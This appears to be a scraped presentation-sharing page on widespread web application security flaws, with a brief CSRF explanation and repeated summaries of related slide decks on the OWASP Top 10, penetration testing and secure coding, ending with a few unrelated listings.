Widespread security flaws in web application development
*SQL Injection - Hands-On Example
*Cross - Site Scripting (XSS)
*Cross Site Request Forgery
*HTTP Strict Transport Security
Cross-Site Request Forgery (CSRF in short) is a kind of a web application vulnerability which allows malicious website to send unauthorized requests to a vulnerable website using active session of its authorized users
In simple words, it’s when an “evil” website posts a new status in your twitter account on your visit while the login session is active on twitter.
For security reasons the same origin policy in browsers restricts access for browser-side programming languages such as Javascript to access a remote content.
As the browsers configurations may be modified, the best way to protect web application against CSRF is to secure web application itself.
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANSamvel Gevorgyan
"Web Application Security is a vast topic
and time is not enough to cover all kind
of malicious attacks and techniques for
avoiding them, so now we will focus on
top 10 high level vulnerabilities.
Web developers work in different ways
using their custom libraries and
intruder prevention systems and now
we will see what they should do and
should not do based on best practices."
- Samvel Gevorgyan
[ Presentation on Scribd ]
http://www.scribd.com/doc/47157267
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
A live hacking session demonstrating the different tools and techniques used by hackers and an in-depth understanding of the problems of insecure application and the solutions to solve the vulnerability.
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
Mission :- Understand / Learn / Practice OWASP Web Security Vulnerabilities https://www.owasp.org/index.php/Top102013-Top_10 In this session, Attendees will perform hands-on exercises to get a better understanding of the OWASP top ten security threats.
Injecting Security into vulnerable web apps at RuntimeAjin Abraham
Web Application Security is not hard, but it’s easy to get it wrong as writing secure code is not easy as preaching. So to overcome incidents happening from such unforeseen events, organisations tend to rely on Web Application Firewalls or WAFs. Web Application Firewalls have been in the industry for a long time. Every one of them either work outside or around the web applications and act by intercepting the HTTP request coming to the web server, then take a decision to allow or block the request based on traditional signature checks. They are never aware of what is happening inside the application like how the user input is getting interpreted, Is the application/server under heavy load?, Is the attacker exfiltrating data by exploiting an SQLi that WAF couldn’t detect? etc. The strength of traditional WAF depends on manual or predefined rules/signature. As a result, they have the limitation that they will get bypassed if a payload is not present in their signature list. In the occurrence of a zero day, a WAF in most cases won’t be able to prevent an attack as they don’t know the signature of the exploit yet.
In this talk I will share my research outcomes on implementing a runtime application patching algorithm on an insecurely coded application to make it secure against code injection vulnerabilities and other logical issues related to web applications. I will introduce the next generation web application defending technology dubbed as Runtime Application Self Protection (RASP) that works by understanding your application to defend against web attacks by working inside the web application. RASP relies on Runtime Patching to inject security into web apps implicitly without introducing additional code changes. The root cause of all the code injection vulnerabilities is that the language interpreter cannot distinguish between data and code. The proposed solution will detect code context breakout to effectively detect and prevent code injections with the help of runtime hooking and patching at framework api or language api level. The research focuses mainly on detecting and preventing vulnerabilities like SQL Injection, Cross Site Scripting, Remote Command Execution, HTTP Verb Tampering, Header Injection, File Upload Bypass, Path Traversal etc and other application security challenges like Session Hijacking, Credential Stuffing and Layer 7 DDoS etc. This research is carried out by implementing a RASP module to a vulnerable web application written in python using tornado framework with sqlite backend.
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
The document summarizes the top 10 security vulnerabilities in web applications according to the Open Web Application Security Project (OWASP). These include injection flaws, cross-site scripting, broken authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, insecure cryptographic storage, failure to restrict URL access, insufficient transport layer protection, and unvalidated redirects and forwards. Countermeasures for each vulnerability are also provided.
The document summarizes the OWASP Top 10 security threats. It describes each of the top 10 threats, including injection, broken authentication, cross-site scripting, insecure direct object references, security misconfiguration, sensitive data exposure, missing access controls, cross-site request forgery, use of vulnerable components, and unsafe redirects/forwards. For each threat, it provides a brief explanation of the meaning and potential impacts, such as data loss, account compromise, or full host takeover. The document encourages implementing people, process, and technology measures to address application security issues.
Cross-Site Request Forgery (CSRF in short) is a kind of a web application vulnerability which allows malicious website to send unauthorized requests to a vulnerable website using active session of its authorized users
In simple words, it’s when an “evil” website posts a new status in your twitter account on your visit while the login session is active on twitter.
For security reasons the same origin policy in browsers restricts access for browser-side programming languages such as Javascript to access a remote content.
As the browsers configurations may be modified, the best way to protect web application against CSRF is to secure web application itself.
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANSamvel Gevorgyan
"Web Application Security is a vast topic
and time is not enough to cover all kind
of malicious attacks and techniques for
avoiding them, so now we will focus on
top 10 high level vulnerabilities.
Web developers work in different ways
using their custom libraries and
intruder prevention systems and now
we will see what they should do and
should not do based on best practices."
- Samvel Gevorgyan
[ Presentation on Scribd ]
http://www.scribd.com/doc/47157267
MS Innovation Day: A Lap Around Web Application Vulnerabilities by MVP Walter...Quek Lilian
A live hacking session demonstrating the different tools and techniques used by hackers and an in-depth understanding of the problems of insecure application and the solutions to solve the vulnerability.
Owasp top 10 web application security hazards - Part 1Abhinav Sejpal
Mission :- Understand / Learn / Practice OWASP Web Security Vulnerabilities https://www.owasp.org/index.php/Top102013-Top_10 In this session, Attendees will perform hands-on exercises to get a better understanding of the OWASP top ten security threats.
Injecting Security into vulnerable web apps at RuntimeAjin Abraham
Web Application Security is not hard, but it’s easy to get it wrong as writing secure code is not easy as preaching. So to overcome incidents happening from such unforeseen events, organisations tend to rely on Web Application Firewalls or WAFs. Web Application Firewalls have been in the industry for a long time. Every one of them either work outside or around the web applications and act by intercepting the HTTP request coming to the web server, then take a decision to allow or block the request based on traditional signature checks. They are never aware of what is happening inside the application like how the user input is getting interpreted, Is the application/server under heavy load?, Is the attacker exfiltrating data by exploiting an SQLi that WAF couldn’t detect? etc. The strength of traditional WAF depends on manual or predefined rules/signature. As a result, they have the limitation that they will get bypassed if a payload is not present in their signature list. In the occurrence of a zero day, a WAF in most cases won’t be able to prevent an attack as they don’t know the signature of the exploit yet.
In this talk I will share my research outcomes on implementing a runtime application patching algorithm on an insecurely coded application to make it secure against code injection vulnerabilities and other logical issues related to web applications. I will introduce the next generation web application defending technology dubbed as Runtime Application Self Protection (RASP) that works by understanding your application to defend against web attacks by working inside the web application. RASP relies on Runtime Patching to inject security into web apps implicitly without introducing additional code changes. The root cause of all the code injection vulnerabilities is that the language interpreter cannot distinguish between data and code. The proposed solution will detect code context breakout to effectively detect and prevent code injections with the help of runtime hooking and patching at framework api or language api level. The research focuses mainly on detecting and preventing vulnerabilities like SQL Injection, Cross Site Scripting, Remote Command Execution, HTTP Verb Tampering, Header Injection, File Upload Bypass, Path Traversal etc and other application security challenges like Session Hijacking, Credential Stuffing and Layer 7 DDoS etc. This research is carried out by implementing a RASP module to a vulnerable web application written in python using tornado framework with sqlite backend.
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
The document summarizes the top 10 security vulnerabilities in web applications according to the Open Web Application Security Project (OWASP). These include injection flaws, cross-site scripting, broken authentication and session management, insecure direct object references, cross-site request forgery, security misconfiguration, insecure cryptographic storage, failure to restrict URL access, insufficient transport layer protection, and unvalidated redirects and forwards. Countermeasures for each vulnerability are also provided.
The document summarizes the OWASP Top 10 security threats. It describes each of the top 10 threats, including injection, broken authentication, cross-site scripting, insecure direct object references, security misconfiguration, sensitive data exposure, missing access controls, cross-site request forgery, use of vulnerable components, and unsafe redirects/forwards. For each threat, it provides a brief explanation of the meaning and potential impacts, such as data loss, account compromise, or full host takeover. The document encourages implementing people, process, and technology measures to address application security issues.
The document discusses the OWASP API Security Top 10 project which aims to raise awareness of common API vulnerabilities. It highlights some frequent issues like input validation problems, insecure configurations, and data/exception leakage. The document also demonstrates examples of these vulnerabilities using a vulnerable demo API called Pixi.
Secure coding is the practice of developing software securely by avoiding security vulnerabilities. It involves understanding the application's attack surface and using techniques like input validation, secure authentication, access control, and encrypting sensitive data. The OWASP organization provides free tools and guidelines to help developers code securely, such as their Top 10 security risks and cheat sheets on issues like injection, authentication, and access control. Developers should use static and dynamic application security testing tools to identify vulnerabilities and continuously learn about secure coding best practices.
Owasp Top 10 And Security Flaw Root CausesMarco Morana
The document discusses root causes of common web application security flaws and vulnerabilities known as the OWASP Top 10. It provides an overview of tactical and strategic approaches to address these issues, including threat modeling, mapping vulnerabilities to application architecture, and implementing security by design principles. Specific guidelines are given for securely handling authentication, authorization, cryptography, sessions, input validation, errors and logging.
This document summarizes a webinar about minimizing the impact of the December 2015 Patch Tuesday updates. It includes an overview of the Microsoft and third party patches released, including 12 Microsoft security bulletins addressing 71 vulnerabilities and an Adobe Flash Player bulletin addressing 78 vulnerabilities. It also provides details on some of the most critical patches, including patches addressing remote code execution vulnerabilities in Windows 10, Internet Explorer, Edge, and other Microsoft products. The webinar aims to help organizations understand and address the patches.
This document discusses analysis of web application penetration testing. It provides statistics on common vulnerabilities like SQL injection, XSS, and file inclusion. It then covers methodologies for information gathering, understanding application logic, observing normal behavior, and targeted testing. A variety of tools for penetration testing are listed, along with search queries that can be used during reconnaissance. The document discusses benefits of penetration testing like protecting companies and meeting compliance. It concludes with recommendations for securing web applications like keeping software updated, input validation, code reviews, and runtime monitoring.
A walkthrough of web application defense strategies, based around the Open Web Application Security Project's top 10 list. Presented to the Classic City Developers Meetup in August 2017.
The bare minimum that you should know about web application security testing ...Ken DeSouza
The document provides an overview of common tools and techniques for web application security testing. It discusses STRIDE/DREAD frameworks for threat modeling and identifying vulnerabilities. It also summarizes the OWASP Top 10 list of risks and demonstrates tools like ZAP, Wireshark, SQLMap and tcpdump for analyzing applications, networks and detecting SQL injection flaws. The document advocates threat modeling to explain security issues to various stakeholders and provides references for further reading.
Web Application Penetration Testing Introductiongbud7
This document provides an overview of web application penetration testing. It discusses the goals of testing to evaluate security by simulating attacks. The testing process involves gathering information, understanding normal application behavior, and then applying targeted techniques to find weaknesses. The document outlines the reconnaissance, mapping, and active testing phases. It also demonstrates various tools like Burp Suite, W3AF, and SQL injection and cross-site scripting attacks.
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
A presentation of the OWASP Top 10 2017 release candidate, expected to be finalized in summer 2017. Presented at the St. Louis CYBER meetup on Wednesday, June 7, 2017.
Abusing Exploiting and Pwning with Firefox AddonsAjin Abraham
This document outlines security vulnerabilities in Firefox add-ons and demonstrates proof of concept exploits. It discusses how Firefox add-ons have full privileges without sandboxing, allowing exploits like keyloggers and downloading executables. Attack techniques to spread malicious add-ons like social engineering and tabnabbing are described. Mitigations include updating Firefox, using antivirus software, and disabling session restoring. The document aims to demonstrate weaknesses to motivate the Firefox team to improve add-on security.
The document discusses various vulnerabilities in web servers and web applications. It covers popular web servers like IIS, Apache, and others. It then discusses attacking vulnerabilities in web servers like sample files, source code disclosure, canonicalization, and buffer overflows. It also discusses vulnerabilities in web applications like cross-site scripting, SQL injection, cross-site request forgery, and HTTP response splitting. It provides examples of exploits and recommendations for countermeasures to secure web servers and applications.
The document provides guidelines for secure coding. It discusses the evolution of software markets and increased security threats. Common web attacks like injection, broken authentication, and sensitive data exposure are explained. The OWASP Top 10 list of vulnerabilities is reviewed. The document emphasizes the importance of secure coding practices like input validation, output encoding, and using components with no known vulnerabilities. Following a secure coding lifestyle can help developers write more secure code and protect against attacks.
Introduction to Web Application Penetration TestingAnurag Srivastava
Web Application Pentesting
* Process to check and penetrate the security of a web application or a website
* process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities
* Any security issues that are found will be presented to the system owner, together with an assessment of the impact, a proposal for mitigation or a technical solution.
This document provides guidelines for secure coding practices to avoid vulnerabilities. It discusses common vulnerabilities like buffer overflows, integer overflows, format string attacks, command injections, and cross-site scripting that result from insecure coding practices in languages like C, C++, Java, and those used for web applications. The document emphasizes that secure coding alone is not enough and security needs to be incorporated throughout the entire software development lifecycle. It also provides examples of insecure code that could enable each type of vulnerability discussed.
OWASP Serbia - A3 broken authentication and session managementNikola Milosevic
Account credentials and session tokens are often not properly protected, allowing unauthorized access to user accounts. Flaws in authentication and session management can undermine security controls and privacy. Attackers exploit weaknesses like ineffective logout processes, password management, and session timeouts to hijack user sessions by stealing or guessing credentials and session tokens. Application developers must implement secure authentication, strong password policies, session management best practices like early session expiration, and logging to prevent such attacks.
The document provides an overview of web application security. It discusses what web application security entails, which is achieving an acceptable level of security for a web application solution. It explains why web application security is important given increased reliance on web apps and their global accessibility. It outlines some common security risks like browser hijacking, cookie theft, and denial of service attacks. It also discusses how security problems should be addressed earlier in the development lifecycle to reduce costs. The document then delves into specific vulnerabilities like hidden field manipulation, cookie poisoning, buffer overflows, and cross-site scripting attacks. Examples are provided to illustrate how attackers can exploit these vulnerabilities.
Web applications are prone to hacking because web developers are often not well-versed in security issues. The top web vulnerabilities are cross-site scripting (XSS), SQL injection, input validation issues, and remote file inclusion. XSS attacks involve injecting malicious code into web pages through user input. SQL injection occurs when user input is not sanitized before being used in SQL queries, allowing attackers to alter queries. Proper input validation and sanitization on both the client- and server-sides are needed to prevent many security bugs. Browser vulnerabilities can also potentially expose issues in web applications if not properly designed with security in mind. Constant vigilance is required to address new attacks and protect applications and users.
The document summarizes the OWASP API Security Top 10 - 2019, which outlines the top 10 most critical API security risks. It includes an introduction to the OWASP API Security Top 10 project, release notes on the first edition, a description of the risk rating methodology used, and summaries of the top 10 risks which are: 1) Broken Object Level Authorization, 2) Broken Authentication, 3) Excessive Data Exposure, 4) Lack of Resources & Rate Limiting, 5) Broken Function Level Authorization.
Technology First
16th Annual Ohio Information Security Conference
OISC 2019
#OISC19
The OWASP Top 10 & AppSec Primer
By Matt Scheurer (@c3rkah)
Dayton, Ohio
Date: 03/13/2019
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG) and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences all over the Ohio, Indiana, and Kentucky Tri-State. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), and Information Systems Security Association (ISSA).
Get Ready for Web Application Security TestingAlan Kan
The document discusses web application security testing and provides guidance for testing professionals. It outlines some of the top attacks like SQL injection and cross-site scripting. It recommends getting educated on security topics, using tools like WebScarab and IBM Rational AppScan to test for vulnerabilities, and incorporating security testing into the development process.
This document provides an agenda for a presentation on comprehensive web application attacks. The presenter, Ahmed Sherif, has over 5 years of experience in penetration testing and web application security. The agenda includes an overview of security in corporations and web technologies, the OWASP security testing methodology, common web attacks like XSS and SQL injection, and a demo of these attacks. The goal is to educate attendees on how to identify and address vulnerabilities in web applications.
The document discusses the OWASP API Security Top 10 project which aims to raise awareness of common API vulnerabilities. It highlights some frequent issues like input validation problems, insecure configurations, and data/exception leakage. The document also demonstrates examples of these vulnerabilities using a vulnerable demo API called Pixi.
Secure coding is the practice of developing software securely by avoiding security vulnerabilities. It involves understanding the application's attack surface and using techniques like input validation, secure authentication, access control, and encrypting sensitive data. The OWASP organization provides free tools and guidelines to help developers code securely, such as their Top 10 security risks and cheat sheets on issues like injection, authentication, and access control. Developers should use static and dynamic application security testing tools to identify vulnerabilities and continuously learn about secure coding best practices.
Owasp Top 10 And Security Flaw Root CausesMarco Morana
The document discusses root causes of common web application security flaws and vulnerabilities known as the OWASP Top 10. It provides an overview of tactical and strategic approaches to address these issues, including threat modeling, mapping vulnerabilities to application architecture, and implementing security by design principles. Specific guidelines are given for securely handling authentication, authorization, cryptography, sessions, input validation, errors and logging.
This document summarizes a webinar about minimizing the impact of the December 2015 Patch Tuesday updates. It includes an overview of the Microsoft and third party patches released, including 12 Microsoft security bulletins addressing 71 vulnerabilities and an Adobe Flash Player bulletin addressing 78 vulnerabilities. It also provides details on some of the most critical patches, including patches addressing remote code execution vulnerabilities in Windows 10, Internet Explorer, Edge, and other Microsoft products. The webinar aims to help organizations understand and address the patches.
This document discusses analysis of web application penetration testing. It provides statistics on common vulnerabilities like SQL injection, XSS, and file inclusion. It then covers methodologies for information gathering, understanding application logic, observing normal behavior, and targeted testing. A variety of tools for penetration testing are listed, along with search queries that can be used during reconnaissance. The document discusses benefits of penetration testing like protecting companies and meeting compliance. It concludes with recommendations for securing web applications like keeping software updated, input validation, code reviews, and runtime monitoring.
A walkthrough of web application defense strategies, based around the Open Web Application Security Project's top 10 list. Presented to the Classic City Developers Meetup in August 2017.
The bare minimum that you should know about web application security testing ...Ken DeSouza
The document provides an overview of common tools and techniques for web application security testing. It discusses STRIDE/DREAD frameworks for threat modeling and identifying vulnerabilities. It also summarizes the OWASP Top 10 list of risks and demonstrates tools like ZAP, Wireshark, SQLMap and tcpdump for analyzing applications, networks and detecting SQL injection flaws. The document advocates threat modeling to explain security issues to various stakeholders and provides references for further reading.
Web Application Penetration Testing Introductiongbud7
This document provides an overview of web application penetration testing. It discusses the goals of testing to evaluate security by simulating attacks. The testing process involves gathering information, understanding normal application behavior, and then applying targeted techniques to find weaknesses. The document outlines the reconnaissance, mapping, and active testing phases. It also demonstrates various tools like Burp Suite, W3AF, and SQL injection and cross-site scripting attacks.
OWASP Top 10 2017 rc1 - The Ten Most Critical Web Application Security RisksAndre Van Klaveren
A presentation of the OWASP Top 10 2017 release candidate, expected to be finalized in summer 2017. Presented at the St. Louis CYBER meetup on Wednesday, June 7, 2017.
Abusing Exploiting and Pwning with Firefox AddonsAjin Abraham
This document outlines security vulnerabilities in Firefox add-ons and demonstrates proof of concept exploits. It discusses how Firefox add-ons have full privileges without sandboxing, allowing exploits like keyloggers and downloading executables. Attack techniques to spread malicious add-ons like social engineering and tabnabbing are described. Mitigations include updating Firefox, using antivirus software, and disabling session restoring. The document aims to demonstrate weaknesses to motivate the Firefox team to improve add-on security.
The document discusses various vulnerabilities in web servers and web applications. It covers popular web servers like IIS, Apache, and others. It then discusses attacking vulnerabilities in web servers like sample files, source code disclosure, canonicalization, and buffer overflows. It also discusses vulnerabilities in web applications like cross-site scripting, SQL injection, cross-site request forgery, and HTTP response splitting. It provides examples of exploits and recommendations for countermeasures to secure web servers and applications.
The document provides guidelines for secure coding. It discusses the evolution of software markets and increased security threats. Common web attacks like injection, broken authentication, and sensitive data exposure are explained. The OWASP Top 10 list of vulnerabilities is reviewed. The document emphasizes the importance of secure coding practices like input validation, output encoding, and using components with no known vulnerabilities. Following a secure coding lifestyle can help developers write more secure code and protect against attacks.
Introduction to Web Application Penetration TestingAnurag Srivastava
Web Application Pentesting
* Process to check and penetrate the security of a web application or a website
* process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities
* Any security issues that are found will be presented to the system owner, together with an assessment of the impact, a proposal for mitigation or a technical solution.
This document provides guidelines for secure coding practices to avoid vulnerabilities. It discusses common vulnerabilities like buffer overflows, integer overflows, format string attacks, command injections, and cross-site scripting that result from insecure coding practices in languages like C, C++, Java, and those used for web applications. The document emphasizes that secure coding alone is not enough and security needs to be incorporated throughout the entire software development lifecycle. It also provides examples of insecure code that could enable each type of vulnerability discussed.
OWASP Serbia - A3 broken authentication and session managementNikola Milosevic
Account credentials and session tokens are often not properly protected, allowing unauthorized access to user accounts. Flaws in authentication and session management can undermine security controls and privacy. Attackers exploit weaknesses like ineffective logout processes, password management, and session timeouts to hijack user sessions by stealing or guessing credentials and session tokens. Application developers must implement secure authentication, strong password policies, session management best practices like early session expiration, and logging to prevent such attacks.
The document provides an overview of web application security. It discusses what web application security entails, which is achieving an acceptable level of security for a web application solution. It explains why web application security is important given increased reliance on web apps and their global accessibility. It outlines some common security risks like browser hijacking, cookie theft, and denial of service attacks. It also discusses how security problems should be addressed earlier in the development lifecycle to reduce costs. The document then delves into specific vulnerabilities like hidden field manipulation, cookie poisoning, buffer overflows, and cross-site scripting attacks. Examples are provided to illustrate how attackers can exploit these vulnerabilities.
Web applications are prone to hacking because web developers are often not well-versed in security issues. The top web vulnerabilities are cross-site scripting (XSS), SQL injection, input validation issues, and remote file inclusion. XSS attacks involve injecting malicious code into web pages through user input. SQL injection occurs when user input is not sanitized before being used in SQL queries, allowing attackers to alter queries. Proper input validation and sanitization on both the client- and server-sides are needed to prevent many security bugs. Browser vulnerabilities can also potentially expose issues in web applications if not properly designed with security in mind. Constant vigilance is required to address new attacks and protect applications and users.
The document summarizes the OWASP API Security Top 10 - 2019, which outlines the top 10 most critical API security risks. It includes an introduction to the OWASP API Security Top 10 project, release notes on the first edition, a description of the risk rating methodology used, and summaries of the top 10 risks which are: 1) Broken Object Level Authorization, 2) Broken Authentication, 3) Excessive Data Exposure, 4) Lack of Resources & Rate Limiting, 5) Broken Function Level Authorization.
Technology First
16th Annual Ohio Information Security Conference
OISC 2019
#OISC19
The OWASP Top 10 & AppSec Primer
By Matt Scheurer (@c3rkah)
Dayton, Ohio
Date: 03/13/2019
Abstract:
Are you testing the security of your web applications, web sites, and web servers? The malicious threat actors on the Internet almost certainly are. We will cover AppSec along with a brief review of the 2017 OWASP Top 10 List. The focus of the presentation is how to get started with AppSec and where to continue learning more. Accompanying the presentation are live demos of Nikto and the OWASP Zed Attack Proxy (ZAP).
Bio:
Matt Scheurer serves as Chair of the Cincinnati Networking Professionals Association Security Special Interest Group (CiNPA Security SIG) and works as a Systems Security Engineer in the Financial Services industry. He holds a CompTIA Security+ Certification and possesses multiple Microsoft Certifications including MCP, MCPS, MCTS, MCSA, and MCITP. He has presented on numerous Information Security topics as a featured speaker at many local area technology groups and large Information Security conferences all over the Ohio, Indiana, and Kentucky Tri-State. Matt maintains active memberships in a number of professional organizations including the Association for Computing Machinery (ACM), Cincinnati Networking Professionals Association (CiNPA), Financial Services - Information Sharing and Analysis Center (FS-ISAC), and Information Systems Security Association (ISSA).
Get Ready for Web Application Security TestingAlan Kan
The document discusses web application security testing and provides guidance for testing professionals. It outlines some of the top attacks like SQL injection and cross-site scripting. It recommends getting educated on security topics, using tools like WebScarab and IBM Rational AppScan to test for vulnerabilities, and incorporating security testing into the development process.
This document provides an agenda for a presentation on comprehensive web application attacks. The presenter, Ahmed Sherif, has over 5 years of experience in penetration testing and web application security. The agenda includes an overview of security in corporations and web technologies, the OWASP security testing methodology, common web attacks like XSS and SQL injection, and a demo of these attacks. The goal is to educate attendees on how to identify and address vulnerabilities in web applications.
This is an introduction to application security, covering some core concepts and the most important practices when creating secure code.
It was developed by Mike McBryde and Bryant Zadegan (during our day job) and released under the Creative Commons. It was first delivered to OWASP DC on March 4, 2015.
The document discusses how web application hacking occurs through examples like SQL injection. It explains the basic components of a web application like the database, server, and client. It then covers the steps an attacker may take, like using tools to find hidden content or exploiting vulnerabilities in how user input is handled to access private user data or delete database tables. The document emphasizes that these types of vulnerabilities are common and provides resources for learning about different hacking techniques as well as the company's security assessment services.
Web Insecurity And Browser ExploitationMichele Orru'
This document provides an outline for a seminar on web insecurity and browser exploitation. It introduces the speaker and their background and experience. The seminar will discuss the top 25 security errors from SANS, with practical demonstrations of vulnerabilities in real world web applications. Specific vulnerabilities that will be covered include improper input validation, improper output encoding, information leaks in error messages, SQL injection, and cross-site scripting. Mitigation strategies and frameworks for each vulnerability will also be discussed. Practical examples of discovered vulnerabilities are provided for selected websites.
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...IBM Security
View the on-demand recording: http://securityintelligence.com/events/avoiding-application-attacks/
Your organization is running fast to build your business. You are developing new applications faster than ever and utilizing new cloud-based development platforms. Your customers and employees expect applications that are powerful, highly usable, and secure. Yet this need for speed coupled with new development techniques is increasing the likelihood of security issues.
How can you meet the needs of speed to market with security? Hear Paul Ionescu, IBM Security, Ethical Hacking Team Lead discuss:
- How application attacks work
- Open Web Application Security Project (OWASP) goals
- How to build defenses into your applications
- The 10 most common web application attacks, including demos of the infamous Shellshock and Heartbleed vulnerabilities
- How to test for and prevent these types of threats
Caleb Sima is the founder and CTO of SPI Dynamics, a security company. He has over 11 years of experience in security and is a frequent speaker on topics like exploiting web security vulnerabilities and hacking web applications. The document discusses various web application vulnerabilities like SQL injection, cross-site scripting, and session hijacking, and provides examples of exploiting these vulnerabilities on real websites.
Make sure you’re defending against the most common web security issues and attacks with this useful overview of software development best-practices. We'll go over the most common attacks against web applications and present real world advice for defending yourself against these types of attacks.
Introduction to Web Application Penetration TestingRana Khalil
Intro to web application penetration testing workshop I held in Atlanta as part of the AnitaBorg Cybersecurity Weekend on Aug. 19. The link for the event can be found here: https://community.anitab.org/event/atl-cybersecurity-day-two/
This document discusses software security and common vulnerabilities in web applications such as SQL injection and cross-site scripting (XSS). It explains that SQL injection exploits vulnerabilities in database applications by injecting malicious SQL code via user input, while XSS injects client-side scripts by storing malicious code in websites. The document demonstrates how these attacks work and can be used to steal sensitive data or inject malware onto users' computers. It emphasizes the importance of validating, sanitizing, and escaping all user input to prevent such vulnerabilities.
Cyber Security Workshop @SPIT- 3rd October 2015Nilesh Sapariya
Got Invited for conducting the workshop on ‘Cyber Security’ at top notch engineering college.
Sardar Patel Institute of Technology, Andheri on 3rd October, 2015.
Student feedback:-
https://drive.google.com/file/d/0B_uWWP1uW7TFWVdTanJFdTlqNkE/view?usp=sharing
Appreciation letter:-
https://drive.google.com/file/d/0B_uWWP1uW7TFMkVVUTR4V1JTN2c/view?usp=sharing
Uncover What's Inside the Mind of a HackerIBM Security
View On-demand Webinar: https://securityintelligence.com/events/uncover-whats-inside-mind-hacker/
A simple software vulnerability can make the bad guys very wealthy. A bustling new market for software vulnerabilities is emerging. An operating system vulnerability can be worth as much as $1 million on the black market.
Ethical Hacker Paul Ionescu aims to put a dent in the bad guys’ pockets by helping developers to “put their hackers’ hats on” and prevent software vulnerabilities.
During this presentation, Paul:
- Demos common software programming flaws
- Discusses notable security breaches that were caused by vulnerabilities such as SQL Injection
- Examines ways to implement software defenses that prevent security flaws from re-emerging
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEAjith Kp
A slide show on the subject web application vulnerabilities. It contains how the vulnerabilities evolves, how to detect, how to exploit and how to defense against the vulnerabilities with example.
The document summarizes the OWASP 2013 top 10 list of web application security risks. It provides descriptions and examples for each of the top 10 risks: 1) Injection, 2) Broken Authentication and Session Management, 3) Cross-Site Scripting (XSS), 4) Insecure Direct Object References, 5) Cross-Site Request Forgery (CSRF), 6) Security Misconfiguration, 7) Sensitive Data Exposure, 8) Missing Function Level Access Control, 9) Using Components with Known Vulnerabilities, and 10) Unvalidated Redirects and Forwards. Protection strategies are also outlined for each risk.
This document summarizes recent trends in web application security vulnerabilities. Client-side attacks like XSS remain prominent along with emerging threats involving mobile and cloud technologies. Old vulnerabilities persist in widely used software like PHP and Apache. The growth of IoT and "smart" devices introduces many new insecure products. Overall, new technologies are often released without security testing, while older software houses long-standing flaws. The document concludes that as applications and networks grow more complex, so too will security issues, requiring continued research and vigilance.
[2.1] Web application Security Trends - Omar GanievOWASP Russia
This document summarizes recent trends in web application security vulnerabilities. Client-side attacks like XSS remain prominent along with emerging threats involving cloud computing, big data, and the Internet of Things. Old vulnerabilities persist in widely used software while new issues are found in new technologies. Overall, the growth of web applications and their interactions creates many new attack surfaces despite ongoing security improvements, ensuring hackers will continue finding novel ways to exploit systems.
IBM AppScan - the total software security solution, Content:
- Introduction to security
- Best Practices for Application Security
- IBM AppScan security solution
- DEMO
Social Enterprise Rises! …and so are the Risks - DefCamp 2012DefCamp
The document discusses social enterprise software and associated security risks. It provides an overview of social enterprise software, why organizations use it, and common deployment models. It then discusses some common security risks like data loss, exploitation of vulnerabilities, and social engineering. The document outlines strategies for risk mitigation and examines several case studies of vulnerabilities found in social enterprise software solutions. It emphasizes that even large vendors can overlook application security and stresses the importance of verification testing.
Hackers versus Developers and Secure Web ProgrammingAkash Mahajan
This document discusses hackers and developers and their different perspectives. Hackers try to find weaknesses and gain access in unintended ways, while developers aim to create secure systems. It notes that hackers only need one opening to exploit a system, while developers must constantly work to maintain security. The good fight is about making secure apps and safeguarding data, and hackers play a necessary role in incentivizing developers. Web app security risks include injection attacks and compromising user data. Developers must validate all untrusted input and encode output to build integrity.
Similar to Widespread security flaws in web application development 2015 (20)
Unveiling the Advantages of Agile Software Development.pdfbrainerhub1
Learn about Agile Software Development's advantages. Simplify your workflow to spur quicker innovation. Jump right in! We have also discussed the advantages.
Atelier - Innover avec l’IA Générative et les graphes de connaissancesNeo4j
Atelier - Innover avec l’IA Générative et les graphes de connaissances
Allez au-delà du battage médiatique autour de l’IA et découvrez des techniques pratiques pour utiliser l’IA de manière responsable à travers les données de votre organisation. Explorez comment utiliser les graphes de connaissances pour augmenter la précision, la transparence et la capacité d’explication dans les systèmes d’IA générative. Vous partirez avec une expérience pratique combinant les relations entre les données et les LLM pour apporter du contexte spécifique à votre domaine et améliorer votre raisonnement.
Amenez votre ordinateur portable et nous vous guiderons sur la mise en place de votre propre pile d’IA générative, en vous fournissant des exemples pratiques et codés pour démarrer en quelques minutes.
Graspan: A Big Data System for Big Code AnalysisAftab Hussain
We built a disk-based parallel graph system, Graspan, that uses a novel edge-pair centric computation model to compute dynamic transitive closures on very large program graphs.
We implement context-sensitive pointer/alias and dataflow analyses on Graspan. An evaluation of these analyses on large codebases such as Linux shows that their Graspan implementations scale to millions of lines of code and are much simpler than their original implementations.
These analyses were used to augment the existing checkers; these augmented checkers found 132 new NULL pointer bugs and 1308 unnecessary NULL tests in Linux 4.4.0-rc5, PostgreSQL 8.3.9, and Apache httpd 2.2.18.
- Accepted in ASPLOS ‘17, Xi’an, China.
- Featured in the tutorial, Systemized Program Analyses: A Big Data Perspective on Static Analysis Scalability, ASPLOS ‘17.
- Invited for presentation at SoCal PLS ‘16.
